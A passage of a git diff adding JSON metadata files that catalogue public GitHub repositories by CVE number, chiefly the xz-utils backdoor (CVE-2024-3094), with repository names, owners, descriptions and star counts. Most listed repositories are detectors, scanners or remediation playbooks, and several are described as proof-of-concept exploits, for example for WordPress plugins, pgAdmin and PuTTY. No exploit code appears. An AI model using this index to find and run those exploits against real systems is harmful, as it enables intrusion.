"https:\/\/github.com\/Security-Phoenix-demo\/CVE-2024-3094-fix-exploits", + "description": "Collection of Detection, Fix, and exploit for CVE-2024-3094 ", + "fork": false, + "created_at": "2024-04-03T07:51:49Z", + "updated_at": "2024-04-26T01:31:19Z", + "pushed_at": "2024-04-03T07:57:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 781419608, + "name": "CVE-2024-3094-backdoor-env-container", + "full_name": "MagpieRYL\/CVE-2024-3094-backdoor-env-container", + "owner": { + "login": "MagpieRYL", + "id": 33757317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33757317?v=4", + "html_url": "https:\/\/github.com\/MagpieRYL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MagpieRYL\/CVE-2024-3094-backdoor-env-container", + "description": "This is a container environment running CVE-2024-3094 sshd backdoor instance, working with https:\/\/github.com\/amlweems\/xzbot project. IT IS NOT Docker, just implemented by chroot.", + "fork": false, + "created_at": "2024-04-03T10:50:47Z", + "updated_at": "2024-11-06T15:35:00Z", + "pushed_at": "2024-04-03T13:05:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781477807, + "name": "xz-backdoor-CVE-2024-3094-Check", + "full_name": "Bella-Bc\/xz-backdoor-CVE-2024-3094-Check", + "owner": { + "login": "Bella-Bc", + "id": 10534659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10534659?v=4", + "html_url": "https:\/\/github.com\/Bella-Bc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bella-Bc\/xz-backdoor-CVE-2024-3094-Check", + "description": "Verify if your installed version of xz-utils is vulnerable to CVE-2024-3094 backdoor", + "fork": false, + "created_at": "2024-04-03T13:09:32Z", + "updated_at": "2024-04-16T17:57:55Z", + "pushed_at": "2024-04-03T14:02:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781642777, + "name": "CVE-2024-3094-Checker", + "full_name": "TheTorjanCaptain\/CVE-2024-3094-Checker", + "owner": { + "login": "TheTorjanCaptain", + "id": 109307319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109307319?v=4", + "html_url": "https:\/\/github.com\/TheTorjanCaptain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheTorjanCaptain\/CVE-2024-3094-Checker", + "description": "The repository consists of a checker file that confirms if your xz version and xz-utils package is vulnerable to CVE-2024-3094.", + "fork": false, + "created_at": "2024-04-03T19:10:43Z", + "updated_at": "2024-04-03T19:12:47Z", + "pushed_at": "2024-04-03T19:36:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781709179, + "name": "CVE-2024-3094-Checker", + "full_name": "iheb2b\/CVE-2024-3094-Checker", + "owner": { + "login": "iheb2b", + "id": 61081690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61081690?v=4", + "html_url": "https:\/\/github.com\/iheb2b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iheb2b\/CVE-2024-3094-Checker", + "description": "The CVE-2024-3094 Checker is a Bash tool for identifying if Linux systems are at risk from the CVE-2024-3094 flaw in XZ\/LZMA utilities. It checks XZ versions, SSHD's LZMA linkage, and scans for specific byte patterns, delivering results in a concise table format. ", + "fork": false, + "created_at": "2024-04-03T22:19:50Z", + "updated_at": "2024-04-03T22:20:53Z", + "pushed_at": "2024-04-06T22:15:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781846725, + "name": "cve-2024-3094", + "full_name": "felipecosta09\/cve-2024-3094", + "owner": { + "login": "felipecosta09", + "id": 33869171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33869171?v=4", + "html_url": "https:\/\/github.com\/felipecosta09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felipecosta09\/cve-2024-3094", + "description": "A tutorial on how to detect the CVE 2024-3094", + "fork": false, + "created_at": "2024-04-04T06:40:56Z", + "updated_at": "2024-04-05T10:39:12Z", + "pushed_at": "2024-04-05T10:50:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "containers", + "containersecurity", + "cve20243094", + "trendmicro", + "visionone", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781963666, + "name": "liblzma-scan", + "full_name": "weltregie\/liblzma-scan", + "owner": { + "login": "weltregie", + "id": 1319341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1319341?v=4", + "html_url": "https:\/\/github.com\/weltregie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/weltregie\/liblzma-scan", + "description": "Scans liblzma from xu-utils for backdoor (CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-04T11:29:41Z", + "updated_at": "2024-04-04T11:31:33Z", + "pushed_at": "2024-04-04T11:36:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782016563, + "name": "ansible-CVE-2024-3094", + "full_name": "crfearnworks\/ansible-CVE-2024-3094", + "owner": { + "login": "crfearnworks", + "id": 128843549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128843549?v=4", + "html_url": "https:\/\/github.com\/crfearnworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crfearnworks\/ansible-CVE-2024-3094", + "description": "Ansible playbooks designed to check and remediate CVE-2024-3094 (XZ Backdoor)", + "fork": false, + "created_at": "2024-04-04T13:31:20Z", + "updated_at": "2024-04-05T21:44:53Z", + "pushed_at": "2024-04-04T18:46:34Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782054881, + "name": "ansible-playbook-cve-2024-3094", + "full_name": "robertdebock\/ansible-playbook-cve-2024-3094", + "owner": { + "login": "robertdebock", + "id": 3830775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3830775?v=4", + "html_url": "https:\/\/github.com\/robertdebock", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robertdebock\/ansible-playbook-cve-2024-3094", + "description": "A small repo with a single playbook.", + "fork": false, + "created_at": "2024-04-04T14:52:09Z", + "updated_at": "2024-04-16T16:04:25Z", + "pushed_at": "2024-04-05T11:12:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 782282800, + "name": "ludus_xz_backdoor", + "full_name": "badsectorlabs\/ludus_xz_backdoor", + "owner": { + "login": "badsectorlabs", + "id": 43366550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43366550?v=4", + "html_url": "https:\/\/github.com\/badsectorlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badsectorlabs\/ludus_xz_backdoor", + "description": "An Ansible Role that installs the xz backdoor (CVE-2024-3094) on a Debian host and optionally installs the xzbot tool.", + "fork": false, + "created_at": "2024-04-05T01:44:26Z", + "updated_at": "2024-06-11T20:12:04Z", + "pushed_at": "2024-04-05T02:36:41Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782827523, + "name": "xz-backdoor-scan", + "full_name": "Juul\/xz-backdoor-scan", + "owner": { + "login": "Juul", + "id": 122752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122752?v=4", + "html_url": "https:\/\/github.com\/Juul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Juul\/xz-backdoor-scan", + "description": "Scan for files containing the signature from the `xz` backdoor (CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-06T06:29:43Z", + "updated_at": "2024-04-06T06:30:17Z", + "pushed_at": "2024-04-07T05:37:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786174088, + "name": "Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-", + "full_name": "fevar54\/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-", + "owner": { + "login": "fevar54", + "id": 80516843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80516843?v=4", + "html_url": "https:\/\/github.com\/fevar54", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fevar54\/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-", + "description": "La siguiente regla YARA ayuda a detectar la presencia del backdoor en la librería liblzma comprometida en sistemas que utilizan las versiones 5.6.0 y 5.6.1 de la herramienta de compresión XZ.", + "fork": false, + "created_at": "2024-04-13T16:37:32Z", + "updated_at": "2024-04-13T16:37:32Z", + "pushed_at": "2024-04-13T16:46:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788459467, + "name": "xzwhy", + "full_name": "neuralinhibitor\/xzwhy", + "owner": { + "login": "neuralinhibitor", + "id": 1449788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1449788?v=4", + "html_url": "https:\/\/github.com\/neuralinhibitor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neuralinhibitor\/xzwhy", + "description": "XZ Utils CVE-2024-3094 POC for Kubernetes", + "fork": false, + "created_at": "2024-04-18T13:08:05Z", + "updated_at": "2024-08-31T10:42:48Z", + "pushed_at": "2024-04-18T15:09:42Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804438695, + "name": "Sicurezza-Informatica-Presentazione", + "full_name": "AndreaCicca\/Sicurezza-Informatica-Presentazione", + "owner": { + "login": "AndreaCicca", + "id": 58073848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58073848?v=4", + "html_url": "https:\/\/github.com\/AndreaCicca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndreaCicca\/Sicurezza-Informatica-Presentazione", + "description": "Presentazione per il corsi di sicurezza Informatica sulla vulnerabilità CVE-2024-3094", + "fork": false, + "created_at": "2024-05-22T15:33:01Z", + "updated_at": "2024-09-01T22:08:40Z", + "pushed_at": "2024-06-07T07:26:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813672523, + "name": "CVE-2024-3094", + "full_name": "shefirot\/CVE-2024-3094", + "owner": { + "login": "shefirot", + "id": 24395852, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24395852?v=4", + "html_url": "https:\/\/github.com\/shefirot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shefirot\/CVE-2024-3094", + "description": "Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster", + "fork": false, + "created_at": "2024-06-11T14:19:17Z", + "updated_at": "2024-06-11T14:21:23Z", + "pushed_at": "2024-06-11T14:21:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824564785, + "name": "CVE-2024-3094", + "full_name": "DANO-AMP\/CVE-2024-3094", + "owner": { + "login": "DANO-AMP", + "id": 40738457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40738457?v=4", + "html_url": "https:\/\/github.com\/DANO-AMP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DANO-AMP\/CVE-2024-3094", + "description": "SSH EXPLOIT BYPASS AUTH SSH", + "fork": false, + "created_at": "2024-07-05T12:02:10Z", + "updated_at": "2024-08-06T14:09:40Z", + "pushed_at": "2024-07-05T12:03:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824707729, + "name": "ifuncd-up", + "full_name": "robertdfrench\/ifuncd-up", + "owner": { + "login": "robertdfrench", + "id": 18403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18403?v=4", + "html_url": "https:\/\/github.com\/robertdfrench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robertdfrench\/ifuncd-up", + "description": "GNU IFUNC is the real culprit behind CVE-2024-3094", + "fork": false, + "created_at": "2024-07-05T18:36:16Z", + "updated_at": "2024-09-16T19:01:30Z", + "pushed_at": "2024-09-04T04:32:15Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3094", + "dynamic-linking", + "dynamic-loading", + "elf", + "glibc", + "global-offset-table", + "ifunc", + "memes", + "procedure-linkage-table", + "relro", + "ssh", + "supply-chain", + "systemd", + "xz-utils-backdoor" + ], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30956.json b/2024/CVE-2024-30956.json new file mode 100644 index 0000000000..c63b729cae --- /dev/null +++ b/2024/CVE-2024-30956.json @@ -0,0 +1,33 @@ +[ + { + "id": 781338781, + "name": "CVE-2024-30956", + "full_name": "leoCottret\/CVE-2024-30956", + "owner": { + "login": "leoCottret", + "id": 71428793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71428793?v=4", + "html_url": "https:\/\/github.com\/leoCottret", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leoCottret\/CVE-2024-30956", + "description": "(DOM-based XSS) HTML Injection vulnerability in TOWeb v.12.05 and before allows an attacker to inject HTML\/JS code via the _message.html component.", + "fork": false, + "created_at": "2024-04-03T07:38:11Z", + "updated_at": "2024-06-24T11:19:11Z", + "pushed_at": "2024-06-24T11:19:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30973.json b/2024/CVE-2024-30973.json new file mode 100644 index 0000000000..134cc81199 --- /dev/null +++ b/2024/CVE-2024-30973.json @@ -0,0 +1,33 @@ +[ + { + "id": 791383768, + "name": "CVE-2024-30973", + "full_name": "Athos-Zago\/CVE-2024-30973", + "owner": { + "login": "Athos-Zago", + "id": 76454989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76454989?v=4", + "html_url": "https:\/\/github.com\/Athos-Zago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Athos-Zago\/CVE-2024-30973", + "description": " POC VIDEO - https:\/\/youtu.be\/hNzmkJj-ImM?si=NF0yoSL578rNy7wN", + "fork": false, + "created_at": "2024-04-24T16:10:22Z", + "updated_at": "2024-04-26T14:57:17Z", + "pushed_at": "2024-04-26T14:57:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30998.json b/2024/CVE-2024-30998.json new file mode 100644 index 0000000000..b84c8f5a66 --- /dev/null +++ b/2024/CVE-2024-30998.json @@ -0,0 +1,33 @@ +[ + { + "id": 779634369, + "name": "CVE-2024-30998", + "full_name": "efekaanakkar\/CVE-2024-30998", + "owner": { + "login": "efekaanakkar", + "id": 130908672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130908672?v=4", + "html_url": "https:\/\/github.com\/efekaanakkar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efekaanakkar\/CVE-2024-30998", + "description": null, + "fork": false, + "created_at": "2024-03-30T11:18:21Z", + "updated_at": "2024-05-25T22:56:19Z", + "pushed_at": "2024-05-25T22:56:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3105.json b/2024/CVE-2024-3105.json new file mode 100644 index 0000000000..539e462ec5 --- /dev/null +++ b/2024/CVE-2024-3105.json @@ -0,0 +1,41 @@ +[ + { + "id": 840743710, + "name": "CVE-2024-3105-PoC", + "full_name": "hunThubSpace\/CVE-2024-3105-PoC", + "owner": { + "login": "hunThubSpace", + "id": 49031710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49031710?v=4", + "html_url": "https:\/\/github.com\/hunThubSpace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunThubSpace\/CVE-2024-3105-PoC", + "description": "A PoC Exploit for CVE-2024-3105 - The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-08-10T14:52:44Z", + "updated_at": "2024-10-02T19:21:21Z", + "pushed_at": "2024-08-10T15:22:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve", + "cve-2024-3105", + "ethical-hacking", + "exploit", + "penetration-testing", + "web" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3116.json b/2024/CVE-2024-3116.json new file mode 100644 index 0000000000..c50bfcf649 --- /dev/null +++ b/2024/CVE-2024-3116.json @@ -0,0 +1,33 @@ +[ + { + "id": 783453075, + "name": "CVE-2024-3116_RCE_in_pgadmin_8.4", + "full_name": "TechieNeurons\/CVE-2024-3116_RCE_in_pgadmin_8.4", + "owner": { + "login": "TechieNeurons", + "id": 94286332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94286332?v=4", + "html_url": "https:\/\/github.com\/TechieNeurons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TechieNeurons\/CVE-2024-3116_RCE_in_pgadmin_8.4", + "description": "Making a lab and testing the CVE-2024-3116, a Remote Code Execution in pgadmin <=8.4", + "fork": false, + "created_at": "2024-04-07T23:03:55Z", + "updated_at": "2024-08-14T14:50:00Z", + "pushed_at": "2024-04-11T01:38:55Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31211.json b/2024/CVE-2024-31211.json new file mode 100644 index 0000000000..cf5e1a2c3a --- /dev/null +++ b/2024/CVE-2024-31211.json @@ -0,0 +1,33 @@ +[ + { + "id": 837708625, + "name": "-CVE-2024-31211", + "full_name": "Abdurahmon3236\/-CVE-2024-31211", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/-CVE-2024-31211", + "description": null, + "fork": false, + "created_at": "2024-08-03T19:26:55Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-03T19:29:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31319.json b/2024/CVE-2024-31319.json new file mode 100644 index 0000000000..bb5b944edc --- /dev/null +++ b/2024/CVE-2024-31319.json @@ -0,0 +1,33 @@ +[ + { + "id": 846408517, + "name": "fix-02-failure-CVE-2024-31319-CVE-2024-0039", + "full_name": "23Nero\/fix-02-failure-CVE-2024-31319-CVE-2024-0039", + "owner": { + "login": "23Nero", + "id": 134192393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134192393?v=4", + "html_url": "https:\/\/github.com\/23Nero", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/23Nero\/fix-02-failure-CVE-2024-31319-CVE-2024-0039", + "description": null, + "fork": false, + "created_at": "2024-08-23T06:28:12Z", + "updated_at": "2024-08-23T09:34:22Z", + "pushed_at": "2024-08-23T09:34:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31351.json b/2024/CVE-2024-31351.json new file mode 100644 index 0000000000..4514edd999 --- /dev/null +++ b/2024/CVE-2024-31351.json @@ -0,0 +1,33 @@ +[ + { + "id": 805642345, + "name": "CVE-2024-31351_wordpress_exploit", + "full_name": "KTN1990\/CVE-2024-31351_wordpress_exploit", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-31351_wordpress_exploit", + "description": "Wordpress - Copymatic – AI Content Writer & Generator <= 1.6 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-05-25T04:02:23Z", + "updated_at": "2024-06-19T22:38:20Z", + "pushed_at": "2024-05-25T04:06:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31497.json b/2024/CVE-2024-31497.json new file mode 100644 index 0000000000..3b26f32a42 --- /dev/null +++ b/2024/CVE-2024-31497.json @@ -0,0 +1,103 @@ +[ + { + "id": 787723118, + "name": "CVE-2024-31497", + "full_name": "sh1k4ku\/CVE-2024-31497", + "owner": { + "login": "sh1k4ku", + "id": 74185433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74185433?v=4", + "html_url": "https:\/\/github.com\/sh1k4ku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sh1k4ku\/CVE-2024-31497", + "description": " A script designed to uncover vulnerabilities in Putty by exploiting CVE-2024-31497.", + "fork": false, + "created_at": "2024-04-17T04:00:20Z", + "updated_at": "2024-04-17T04:01:30Z", + "pushed_at": "2024-04-17T04:00:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787871319, + "name": "cve-2024-31497", + "full_name": "edutko\/cve-2024-31497", + "owner": { + "login": "edutko", + "id": 1013264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1013264?v=4", + "html_url": "https:\/\/github.com\/edutko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edutko\/cve-2024-31497", + "description": null, + "fork": false, + "created_at": "2024-04-17T10:43:42Z", + "updated_at": "2024-04-25T09:08:10Z", + "pushed_at": "2024-04-17T10:44:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798816693, + "name": "CVE-2024-31497-POC", + "full_name": "HugoBond\/CVE-2024-31497-POC", + "owner": { + "login": "HugoBond", + "id": 72299419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72299419?v=4", + "html_url": "https:\/\/github.com\/HugoBond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HugoBond\/CVE-2024-31497-POC", + "description": "Proof Of Concept that exploits PuTTy CVE-2024-31497.", + "fork": false, + "created_at": "2024-05-10T14:30:50Z", + "updated_at": "2024-06-18T18:14:02Z", + "pushed_at": "2024-05-11T13:33:17Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-31497", + "ecdsa", + "exploit", + "poc", + "putty", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31666.json b/2024/CVE-2024-31666.json new file mode 100644 index 0000000000..5e200ade69 --- /dev/null +++ b/2024/CVE-2024-31666.json @@ -0,0 +1,33 @@ +[ + { + "id": 779944558, + "name": "CVE-2024-31666", + "full_name": "hapa3\/CVE-2024-31666", + "owner": { + "login": "hapa3", + "id": 30132259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30132259?v=4", + "html_url": "https:\/\/github.com\/hapa3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hapa3\/CVE-2024-31666", + "description": null, + "fork": false, + "created_at": "2024-03-31T08:27:30Z", + "updated_at": "2024-09-12T10:36:48Z", + "pushed_at": "2024-09-12T10:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31719.json b/2024/CVE-2024-31719.json new file mode 100644 index 0000000000..7479560b8d --- /dev/null +++ b/2024/CVE-2024-31719.json @@ -0,0 +1,33 @@ +[ + { + "id": 672397199, + "name": "CVE-2024-31719----AMI-Aptio-5-Vulnerability", + "full_name": "VoltaireYoung\/CVE-2024-31719----AMI-Aptio-5-Vulnerability", + "owner": { + "login": "VoltaireYoung", + "id": 44109336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44109336?v=4", + "html_url": "https:\/\/github.com\/VoltaireYoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoltaireYoung\/CVE-2024-31719----AMI-Aptio-5-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-07-30T00:07:14Z", + "updated_at": "2024-09-10T07:11:45Z", + "pushed_at": "2024-09-10T07:11:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3177.json 